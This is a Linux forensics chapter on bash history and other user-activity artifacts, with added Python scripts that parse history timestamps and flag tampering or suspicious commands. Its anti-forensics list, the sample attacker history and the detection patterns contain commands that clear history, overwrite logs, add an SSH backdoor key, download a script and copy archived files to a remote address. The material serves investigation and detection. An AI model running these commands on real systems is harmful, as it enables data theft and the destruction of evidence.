Bash history is one of the most valuable sources of user activity evidence on Linux systems. It records commands typed by users in the terminal, making it extremely useful for reconstructing actions taken by administrators, normal users, or attackers. Along with other user-level artifacts, bash history helps build an accurate picture of what happened on a system, when it happened, and potentially who executed it.
This chapter explains how bash history works, where it is located, how attackers manipulate it, and what additional user activity artifacts investigators should examine.
Bash History Overview
Most Linux shells record executed commands in a history file.
For the standard Bash shell, this file is:
/home/<user>/.bash_history
and for the root user:
/root/.bash_history
Commands are held in memory for the length of the session and written to this file when the shell exits, so a session that is still open, or one that was killed rather than logged out, may have left nothing on disk yet.
How Bash History Works
Commands executed in a terminal are stored in memory while the user is logged in.
When the user logs out:
- Commands are written to .bash_history
- Older entries are dropped once the configured history size limit is reached
- Environment variables control what gets saved
Key environment variables:
- HISTFILE: path of the history file (default ~/.bash_history)
- HISTSIZE: number of commands kept in memory during the session
- HISTFILESIZE: maximum number of lines stored in the history file
- HISTCONTROL: controls duplicate handling and whether commands starting with a space are ignored (ignoredups, ignorespace, ignoreboth)
Example:
HISTCONTROL=ignoreboth
Forensic Value of Bash History
Bash history can reveal:
- Commands used for system administration
- Installation or execution of malware
- Data exfiltration commands (scp, rsync, curl, wget)
- Creation or deletion of users
- Privilege escalation attempts
- Clearing of logs or evidence
- Suspicious shell scripts
- File downloads
- Persistence setup (cron, systemctl, ssh keys)
Investigators can use bash history to reconstruct every major action performed by a user.
Limitations of Bash History
Bash history does not record:
- Timestamps by default
- Commands executed via GUI
- Commands run by scripts
- Commands executed with sudo (unless configured)
- Commands that start with a space (if ignoreboth/ignorespace enabled)
Attackers often try to disable or manipulate bash history.
Timestamps in Bash History
By default, bash does not store timestamps, but timestamps can be enabled via:
export HISTTIMEFORMAT="%F %T "
When enabled, entries look like:
#1709829300
ls -la
#1709829321
cat /etc/passwd
The number after # is a UNIX epoch timestamp (seconds since 1970-01-01 UTC) written on the line before each command. The value of HISTTIMEFORMAT only controls how the history builtin displays the time; the file itself always stores the raw epoch.
If present, timestamps significantly improve timeline analysis.
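The following parser, added here as an example and not taken from the chapter, turns a history file in the format shown above into a timeline. The sample file contents are constructed; the parser keeps unstamped commands (which appear when HISTTIMEFORMAT was enabled partway through an account's lifetime) visible as gaps rather than letting them inherit an earlier stamp.

```python
"""Parse a .bash_history file that may carry HISTTIMEFORMAT stamps.

Added example, not part of the chapter. The sample below is constructed;
it mixes stamped entries (as written by Bash when HISTTIMEFORMAT is set)
with an unstamped one.
"""
from datetime import datetime, timezone

# Constructed sample history file contents.
SAMPLE_HISTORY = """\
#1709829300
ls -la
#1709829321
cat /etc/passwd
echo no-stamp-here
#1709829400
tar czf /tmp/a.tgz /etc
"""


def parse_bash_history(text):
    """Return a list of (epoch_or_None, command) tuples in file order.

    With HISTTIMEFORMAT set, Bash writes a '#<epoch>' line immediately
    before each command. A stamp applies only to the command that follows
    it; a command with no preceding stamp is reported with None so the gap
    stays visible instead of inheriting an earlier time.
    Caveat: a user-typed command consisting only of '#' and digits is
    indistinguishable from a stamp in the file itself.
    """
    entries = []
    pending = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#") and line[1:].isdigit():
            pending = int(line[1:])
            continue
        entries.append((pending, line))
        pending = None
    return entries


def to_timeline(entries):
    """Render entries as 'YYYY-MM-DD HH:MM:SSZ  command' rows (UTC)."""
    rows = []
    for epoch, cmd in entries:
        if epoch is None:
            stamp = "<no stamp>".ljust(20)
        else:
            stamp = datetime.fromtimestamp(epoch, tz=timezone.utc).strftime(
                "%Y-%m-%d %H:%M:%SZ")
        rows.append(f"{stamp}  {cmd}")
    return rows


if __name__ == "__main__":
    for row in to_timeline(parse_bash_history(SAMPLE_HISTORY)):
        print(row)
```

Times are rendered in UTC on purpose: the epoch in the file is timezone-independent, and converting to the analyst's local zone silently shifts the timeline when the evidence came from a host in another zone.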
Bash History Anti-Forensics
Attackers commonly attempt to hide their actions by manipulating bash history.
Common techniques:
1. Clearing history
history -c
2. Removing the history file
rm ~/.bash_history
3. Preventing logging during a session
unset HISTFILE
4. Preventing logging of a single command
Prefix it with a space (only effective when HISTCONTROL includes ignorespace or ignoreboth); note the leading space:
 ls /etc/
5. Disabling history temporarily
set +o history
6. Editing the .bash_history file manually
7. Emptying or overwriting the file (for example with an empty redirect, or with null bytes)
> ~/.bash_history
Investigators should check timestamps, shell configuration files, login records, and other logs to detect these manipulations. An empty or missing history file for an account that login records show was active is itself a finding.
Additional User Activity Artifacts
Bash history alone is not enough. Other system components also track user activity.
1. /var/log/auth.log or /var/log/secure
Tracks:
- Login attempts
- Sudo usage
- SSH access
- Privilege escalation
This helps confirm whether commands in history were executed with elevated privileges.
2. .bash_logout, .bashrc, .profile
These files may contain:
- Custom scripts
- Malicious persistence
- Aliases used to hide commands
- Disabled history settings
Inspect these files for tampering.
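A scanner for the history-disabling settings listed in the anti-forensics section and the shell startup files above, added here as an example (it is not code from the chapter). It reports each matching line with a severity; the sample .bashrc is constructed. HISTCONTROL=ignoreboth is reported at "info" level because it ships as a default on some distributions and only matters alongside other findings.

```python
"""Flag history-disabling settings in shell startup files.

Added example, not part of the chapter. It scans the text of files such
as ~/.bashrc, ~/.profile and ~/.bash_logout for the settings the chapter
lists as ways of disabling or thinning history, and reports each with its
line number and a severity. The sample file below is constructed.
"""
import re

# (severity, regex, reason). 'info' entries are common defaults that only
# matter in combination with other findings.
CHECKS = [
    ("high", re.compile(r"^\s*unset\s+HISTFILE\b"), "HISTFILE unset: nothing is saved at logout"),
    ("high", re.compile(r"\bHISTFILE=\s*/dev/null\b"), "history file redirected to /dev/null"),
    ("high", re.compile(r"\bHISTSIZE=\s*0\b"), "HISTSIZE=0: no commands kept in memory"),
    ("high", re.compile(r"\bHISTFILESIZE=\s*0\b"), "HISTFILESIZE=0: file truncated to nothing"),
    ("high", re.compile(r"\bset\s+\+o\s+history\b"), "history recording switched off"),
    ("high", re.compile(r"^\s*history\s+-c\b"), "history cleared on every shell start or exit"),
    ("high", re.compile(r"^\s*alias\s+history="), "history builtin masked by an alias"),
    ("info", re.compile(r"\bHISTCONTROL=\S*ignore(space|both)\b"), "space-prefixed commands are not recorded"),
]

# Constructed sample startup file.
SAMPLE_BASHRC = """\
# ~/.bashrc (constructed sample)
HISTCONTROL=ignoreboth
export PATH=$PATH:/opt/bin
unset HISTFILE
alias history='true'
 set +o history
# unset HISTFILE   <- commented out, has no effect
"""


def find_history_tampering(config_text, source="<config>"):
    """Return [(source, line_no, severity, line, reason)] for each hit.

    Blank lines and comment lines are skipped because they have no effect
    on the shell; everything else is matched against every check, so a
    single line can produce more than one finding.
    """
    findings = []
    for line_no, line in enumerate(config_text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for severity, rx, reason in CHECKS:
            if rx.search(line):
                findings.append((source, line_no, severity, stripped, reason))
    return findings


def high_severity(findings):
    """Keep only findings that on their own indicate deliberate disabling."""
    return [f for f in findings if f[2] == "high"]


if __name__ == "__main__":
    for src, no, sev, line, reason in find_history_tampering(SAMPLE_BASHRC, "~/.bashrc"):
        print(f"{src}:{no} [{sev}] {line!r}: {reason}")
```

Run it over every startup file Bash reads for the account (the system-wide /etc/bash.bashrc and /etc/profile as well as the per-user files), since a setting placed in any of them takes effect for every interactive shell.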
3. SSH Artifacts
Known hosts: ~/.ssh/known_hosts
Authorized keys: ~/.ssh/authorized_keys
SSH connection logs: /var/log/auth.log (or /var/log/secure)
These indicate:
- What systems the user connected to (known_hosts)
- Which systems connected inbound (auth.log)
- Possible backdoor SSH keys (authorized_keys)
4. Cron Jobs
User-level cron jobs are stored in:
/var/spool/cron/crontabs/<user>
(the Debian/Ubuntu path; RHEL-family systems use /var/spool/cron/<user>) and system-wide jobs in:
/etc/crontab
Attackers frequently use cron for persistence.
5. User Login Records (utmp, wtmp, btmp)
Commands:
who   # current logins (utmp)
last  # login/logout history (wtmp)
lastb # failed logins (btmp)
Shows:
- User session timelines
- Failed/successful logins
- Remote access attempts
6. Shell Command Logs (Auditd)
If auditd is enabled with rules that capture process execution, every command executed is logged, including commands that never reach any shell history file.
Records are stored in:
/var/log/audit/audit.log
Useful for detecting privilege escalation or the use of sensitive commands.
7. Zsh or Other Shell Histories
If the system uses another shell:
- Zsh: ~/.zsh_history
- Fish: ~/.local/share/fish/fish_history
Forensics should check all potential shells.
Techniques for Analyzing Bash History
1. Correlate history with logs
Match commands with:
- auth.log
- syslog
- wtmp
- cron logs
2. Identify suspicious commands
Look for:
- wget/curl downloads
- Adding SSH keys
- chmod/chown changes
- Adding users
- Tar or zip usage (data staging)
- SCP/rsync commands
3. Search for attacker patterns
Examples:
- echo * > /var/log/auth.log
- rm -rf /tmp/*
- Commands starting with spaces
- Disabled history settings
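A triage script for the two lists above (suspicious command categories and attacker patterns), added as an example and not taken from the chapter. It tags each history line with the categories it matches and counts them; the history excerpt is constructed and uses only reserved example hostnames and addresses. Lines recorded with a leading space are flagged too: Bash only writes such a line when ignorespace is not active, so its presence in the file suggests an attempt to avoid logging that did not work.

```python
"""Flag suspicious commands in a bash history excerpt.

Added example, not part of the chapter. It covers the chapter's two
lists: suspicious command categories (downloads, SSH keys, permission
changes, user creation, archive staging, scp/rsync) and attacker patterns
(log overwriting, /tmp cleanup, history disabling). The history text
below is constructed; hosts use documentation/reserved names only.
"""
import re
from collections import Counter

# (category, regex). Order only affects the order of categories reported.
PATTERNS = [
    ("space_prefixed", re.compile(r"^\s+\S")),  # recorded despite a leading space
    ("history_disable", re.compile(
        r"unset\s+HISTFILE|set\s+\+o\s+history|\bhistory\s+-c\b|HIST(FILE)?SIZE=0")),
    ("log_overwrite", re.compile(r">\s*/var/log/")),
    ("tmp_cleanup", re.compile(r"\brm\s+-r\S*\s+/tmp\b")),
    ("download", re.compile(r"\b(wget|curl)\b")),
    ("ssh_key", re.compile(r"\.ssh/authorized_keys")),
    ("permission_change", re.compile(r"\b(chmod|chown)\b")),
    ("user_add", re.compile(r"\b(useradd|adduser)\b")),
    ("archive_staging", re.compile(r"\b(tar|zip)\b")),
    ("remote_transfer", re.compile(r"\b(scp|rsync)\b")),
]

# Constructed sample history; example.invalid and 203.0.113.0/24 are reserved.
SAMPLE_HISTORY = """\
ls -la
curl -o /tmp/x.sh http://example.invalid/x.sh
chmod +x /tmp/x.sh
echo 'ssh-ed25519 AAAAEXAMPLEKEY' >> ~/.ssh/authorized_keys
useradd -m svc_backup
tar czf /tmp/out.tgz /home/alice/Documents
scp /tmp/out.tgz user@203.0.113.5:/tmp/
echo * > /var/log/auth.log
rm -rf /tmp/*
 history -c
unset HISTFILE
cd /var/www
"""


def flag_commands(text):
    """Return [(line_no, categories, command)] for lines matching any pattern.

    HISTTIMEFORMAT stamp lines ('#<epoch>') are skipped. The command is
    kept unstripped so a leading space remains visible in the report.
    """
    flagged = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or (line.startswith("#") and line[1:].isdigit()):
            continue
        cats = tuple(name for name, rx in PATTERNS if rx.search(line))
        if cats:
            flagged.append((line_no, cats, line))
    return flagged


def summarize(flagged):
    """Count how many flagged lines fall into each category."""
    return Counter(cat for _, cats, _ in flagged for cat in cats)


if __name__ == "__main__":
    hits = flag_commands(SAMPLE_HISTORY)
    for line_no, cats, cmd in hits:
        print(f"{line_no:>3}  {', '.join(cats):<32} {cmd!r}")
    print(dict(summarize(hits)))
```

The categories are deliberately broad: tar, chmod or curl are routine for administrators, so the value is in the sequence and density of hits within one session, which is why the line numbers are kept for correlation with the timestamps and login records discussed earlier.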
4. Recover deleted bash history
Techniques:
- File carving (photorec, foremost)
- Searching unallocated space
- Checking the file system journal (e.g. ext4)
- Reviewing backup or shadow copies
Summary
Bash history is a key source of user activity evidence on Linux systems. It records terminal commands, helping investigators reconstruct user actions, privilege escalation, file access, system modifications, and potential malicious behavior. Although attackers may attempt to manipulate or disable history, cross-checking with logs and other artifacts allows investigators to detect tampering and rebuild accurate timelines. Bash history, combined with SSH logs, cron jobs, login records, and audit logs, forms the foundation of Linux user activity forensics.